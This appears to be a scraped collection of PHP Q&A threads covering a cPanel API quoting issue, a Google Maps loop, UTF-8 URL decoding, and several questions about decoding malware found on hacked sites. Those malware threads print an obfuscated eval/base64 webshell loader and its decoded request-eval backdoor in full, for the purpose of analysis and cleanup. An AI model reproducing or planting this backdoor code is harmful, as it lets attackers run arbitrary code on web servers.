I found a very strange bug using this word ""a".
I am using the cPanel API.
I tested Firefox, Chrome, Safari, and others.
Do it yourself.
Simple PHP:
<?php
echo ""a";
?>
Return:
"a
JSON API shape cPanel
https://hostname.example.com:2087/cpsess##########/json-api/cpanel?cpanel_jsonapi_user=user&cpanel_jsonapi_apiversion=2&cpanel_jsonapi_module=Email&cpanel_jsonapi_func=addpop&domain="example.com"&email="user"&password="12345luggage""a="500"
Return:
https://hostname.example.com:2087/cpsess##########/json-api/cpanel?cpanel_jsonapi_user=user&cpanel_jsonapi_apiversion=2&cpanel_jsonapi_module=Email&cpanel_jsonapi_func=addpop&domain="example.com"&email="user"&password="12345luggage""a="500"
Could someone help me put this ""a"?
I tried to think of everything.
I already put:
Is it possible to cheat using PHP?
"a -> back "a
"A
Believe appears and &quoTA, but does not send the string (should be lowercase).
Searching on http://www.w3.org/TR/html4/appendix/notes.html#h-B.2.2. and in the PHP manual using urldecode and urlencode for help "#IdontDownVote" I understood better about my problem.
What did I do
<?php
$e_com=htmlentities(urldecode('"a=1000'));
echo $e_com;
?>
I had to decode
http://php.net/manual/pt_BR/function.urldecode.php
Thank you very much
Related
I'm pulling google map data into a php array from MySQL. I have used this code as a base:
https://github.com/rajkavinchetty/Google-Maps-API-with-PHP-MySQL/blob/master/index.php
It almost works perfectly. The lat/long data is pulled from the array and sets-up the markers.
...
$locations[]=array( 'name'=>$name, 'lat'=>$latitude, 'lng'=>$longitude, 'lnk'=>$link );
...
But I'm having problem with the Title/Content of the infowindow.
With the base example I'm using, the content is formatted as a link:
var locations = [
<?php for($i=0;$i<sizeof($locations);$i++){ $j=$i+1;?>
[
'AMC Service',
'<p><?php echo $locations[0]['name'];?></p>',
<?php echo $locations[$i]['lat'];?>,
<?php echo $locations[$i]['lng'];?>,
0
]<?php if($j!=sizeof($locations))echo ","; }?>
];
but the variable pulls only the first link and name from the array, it does not go through the loop. I have tried many different variables, such as
<?php echo $locations[$i]['name'];?>
but this gives an error.
I'm not an expert in either php arrays or loop or java, so I'm fumbling around for clues. I've looked through all of the related questions here for help, and also consulted the Google stack as well.
Any help would be appreciated.
UPDATE:
The first three replies were useful, thank you, but no there yet.
After the comment from Andy, and encouragement from Divyamohan that the original solution should have worked, I realised that there must be some json formatting problem, so I tried:
<?php echo json_encode($locations[$i]['name']);?>
This worked and now I'm able to have these loop through.
But still trying to get this to work as an href link. I tried to solve with backslashes as Hardik and David observed, but still this does not work. Half way there.
'<p><?=$locations[$i]["name"]?></p>'
Just Replace this in your code and it should work.
You need to change this line
'<p><?php echo $locations[0]['name'];?></p>'
to
'<p><?php echo $locations[0][\'name\'];?></p>'
You need to add backslash ( \ ) character to escape quote from string literals.
So finally I found the solution to the problem. Thanks to the comments from everyone that helped me to look at it another way.
In the end, the problem was not with the code. The problem was the data. This should have been obvious. In the links column I had URLs with slashes and text in the names column included apostrophes and foreign characters. These combined were throwing off the json errors. I cleaned all the data and the modified code works perfectly.
<p><?=$locations[$i]['name']?></p>
Many thanks again for the comments.
I Have read a lot on the normal php eval with the base64_encoder and was able to decode much of the infected php files.
With that said, I have this one file that does not follow standard eval call and I would like some help from the community.
Can anyone decode and/or tell me whats happening in the code?
Thanks,
--Eric
<?php /*vg!*/eval/*E}--oP8*/(/*pxHO*/base64_decode/*vgKGm*/(/*0%C*/'LypPSnBvKi9ldmFsLypGUSZRX00qLygvKk56SiovYmFzZTY0X2RlY29kZS8qPDU+cyovKC8qTVl5YnMqLydMeW91U
EZJcUwybG1MeXBiY0h0aFZTb3ZLQzhxZCcvKndLc2Q/PGgqLy4vKllcdkgqLycweHVYRFJvTkNvdmFYTnpaWFF2S2sxTVBDb3ZLQycvKiF9Z1sqLy4vKiBrVlQqLyc4cWRYMHJLaThrWDFKRlVWVkZVMVF2S2
54Mk9DdCcvKjlRSG1Ta1FIKi8uLypFYlMuaCovJ2VNRHM4S2k5Ykx5cHNkSFlxTHlkakp5OHFkMmRHJy8qQUI5Ki8uLypxcyFIZU4qLydlQ292TGk4cVFsVXpObElxTHlkdUp5OHFjRGw0SScvKiY6ZSovLi8
qSlVxKi8nVU51S2k4dUx5b3hYQ1o2S2k4bmVTY3ZLbU10Sz'/*0B>.'&CK*/./*W1H*/'MnLypxcFpJKi8uLypBKWVTKi8nQlNLaTh1THlwa2JqRTFKVG9xTHlkemNTY3ZLa2QnLypgZj5zZTgqLy4vKjlENT
FcTyovJ0ROVGxWS2k5ZEx5cFRORXc1S2k4dkttaytXVE1vJy8qOmBaRUtlJkUqLy4vKlVILjspZSovJ1pTb3ZLUzhxT1RCbFVsWlZLaTh2S2xaSmRTVkpmJy8qVzpMa2hUKi8uLyo1cTNmdT8qLydDb3ZLUzh
xTlZvM0ppb3ZaWFpoYkM4cVp5MWNTMCcvKmheXTtbICovLi8qTC5SS2JZKi8nY3FMeWd2S21KNFZVNHllU292YzNSeWFYQnpiR0YnLypTS2MuJSovLi8qb3MwXjUySHsqLyd6YUdWekx5cGVWVjUzYnlvdktD
OHFKMk00SjBvcScvKlJrSCEqLy4vKk41JjkqLydMeVJmVWtW'/*Ju%:AN*/./*0\`a Z=*/'UlZVVlRWQzhxUUNoZGF5b3ZXeThxTCcvKjw8J3guaCovLi8qbixXKi8nV1JXZXpKSFB6QXFMeWRqYmljdktpMX
JlVkpKS2knLyotVS5zKi8uLyogUl5OKi8nOHVMeXBFVnpKYVoyRXFMeWQ1YzNFbkx5bzRTMFknLypjWmsqLy4vKjNkeWVMKi8naElEb3lRU292WFM4cU5peDZkU292THlwdlNVSngnLyonQVJWdyl1Ki8uLyp
eX1pKOmZ2Ki8nVVNvdktTOHFNV0JqS1V3cUx5OHFiMVU4T2tzcUwnLypUdlQrJkYqLy4vKmtFPDNmISovJ3lrdktsVkllMnNsS2k4dktsWmhVaTVUS3lvdk95OHFKbHhoZlN4MEtpOD0nLypaKWVePyovKS8q
J2tYKi8vKmsmViovKS8qMWdFVyovLyo8OHhObSovOy8qXW8/Ki8='/*L,}I*/)/*8Oyj*//*uEGgU*/)/*+LT*//*Q?.e*/;/*oGCkBv*/ ?>
If you go all the way down the rabbit hole, you get the following command.
if(isset($_REQUEST['cnysq']))eval(stripslashes($_REQUEST['cnysq']));
If you open the code up in a visual editor, you'll see there are a lot of comments. Remove those, and you'll see that it's a bas64 encoded string.
Decode that, and you'll see more of the same.
Keep removing comments and concatenating strings and after about 3 levels, you get to this point.
It's just a bunch of PHP comments in there, e.g. from the first line:
<?php /*vg!*/eval/*E}--oP8*/(/*pxHO*/base64_decode/*vgKGm*/(/*0%C*/'LypPSnB etc...
^^^^^^^ ^^^^^^^^^^^ ^^^^^^^^ ^^^^^^^^^ ^^^^^^^--comments
is really just
<?php eval(base64_decode('LyPSnB etc...
We have a PHP site on Zend Framework with a backend Postgresql database. Our primary character encoding is UTF-8.
I just checked our error log and found a strange entry. My URL is as follows:
www.mydomain.com/schuhe-für-breite-füsse
however someone (or maybe a bot) has tried to access this URL as follows:
www.mydomain.com/schuhe-f\xc3\xbcr-breite-f\xc3\xbcsse/
It's the first time I've seen something like the above. Two things are happening on my page:
1) The above URL is queried against our CMS. This works fine for some reason, I think Postgresql reaslises it is byte-encoded and then converts it back when tried to find this SEF URL in our database.
2) An Ajax request is made on the page, passing the same SEF URL. This fails. I believe the slashes are causing a problem on Javascript.
To avoid this I want to decode any URL that is encoded like this. However a quick test of the following code did not decode anything for me :(
$landing_sef_url = $this->_getParam('landing_sef_url');
$utf8=html_entity_decode($landing_sef_url);
$iso8859=utf8_decode($utf8);
$test3 = html_entity_decode($landing_sef_url, 1, "ISO-8859-1");
$test4 = urldecode($landing_sef_url);
echo utf8_decode("$landing_sef_url");
echo "<br/><br/>";
die($landing_sef_url . " -- $utf8 -- $iso8859 <br/>$test3<br/>$test4");
I found the above via various posts online but they all print back the same result - schuhe-f\xc3\xbcr-breite-f\xc3\xbcsse
Any help would be MUCH appreciated. Many thanks!
This method seems to do what you're looking for:
http://li.php.net/manual/en/function.stripcslashes.php
But if you're just looking to unescape \x## sequences, you could also do this with a fairly simple regular expression.
I have a file that I'm trying to decode but I'm not sure the best way to go about doing it. I've tried putting it through a few online tools but haven't had much luck...the code looks like this:
<?php
$zAkSoSavjFOn='jumbledcodeinhere';
$THkNltHSOjsXfQLzr=';))))aBSwinFbFxNm$(ireegf(rqbprq_46rfno(rgnysavmt(ynir';
$DzbOntpeGhMcan=strrev($THkNltHSOjsXfQLzr);
$WnJYuMUwKmRxBh=str_rot13($DzbOntpeGhMcan);
eval($WnJYuMUwKmRxBh);
?>
In all my playing I managed to extract the following with a php script:
eval(gzinflate(base64_decode(strrev($zAkSoSavjFOn))));
Could someone point me in the right direction on going about this process? Any help would be appreciated. :)
The "jumbled code" is gzipped, base64-encoded, reversed PHP code that is almost certainly malicious.
Replace eval with echo and see what it gives you, that's what the code that is trying to run is.
I just noticed today that I have got lots of spam links in my wordpress blog. I just found a file which contains
<?php eval (chr(101).chr(114)...
Its very very long string. Can someone tell me how can I decode this to see what it does? So that I can try to remove the spam links?
Thanks.
Just replace eval by echo and have a look at the generated output
<?php echo (chr(101).chr(114)...
Instead of executing (eval) you can just echo out what it says, preferrably with htmlspecialchars if you execute it via browser:
<?php echo htmlspecialchars(chr(101)...
odds are though that you won't see anything understandable, since it is probably encoded in more ways than one.
Simply replace eval with echo:
<?php echo (chr(101).chr(114)...
Besides that, you most likely need to reinstall whatever you have on your webspace as you obviously have been hacked. Ensure that you use the most recent version of Wordpress and all other software you are running to prevent this from happening again.